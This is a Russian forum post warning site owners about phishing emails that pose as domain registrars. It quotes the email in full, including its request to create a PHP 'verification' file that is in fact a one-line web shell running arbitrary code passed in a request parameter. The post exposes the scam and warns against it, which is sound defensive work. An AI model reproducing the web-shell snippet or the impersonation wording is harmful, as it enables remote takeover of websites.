23.12.2016, 20:21
|
Start Post: Взлом сайтов от имени регистраторов доменов
|
Senior Member
Регистрация: 01.08.2016
Сообщений: 1,332
Бабло: $155245
|
В последние 2 дня активизировались хакеры, использующие старый, как дерьмо мамонта, трюк - письмо с поддельным адресом отправителя.
Рассылаются письма от имени nic.ru и <info@r01 l.ru> - красным выделена левая буква, которой не будет видно в html-коде письма:
Цитата:
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом *****.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7odfa980f11ce6.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 декабря 2016 года, 22:00 (UTC+04:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
|
То есть, предлагают самому себе на сайте сделать бэкдор. Наивно, но на всякий случай - не ведитесь.
PS: Похоже, рассылка идёт по доменам в алфавитном порядке, пока ещё работают по букве "a".
|
|
|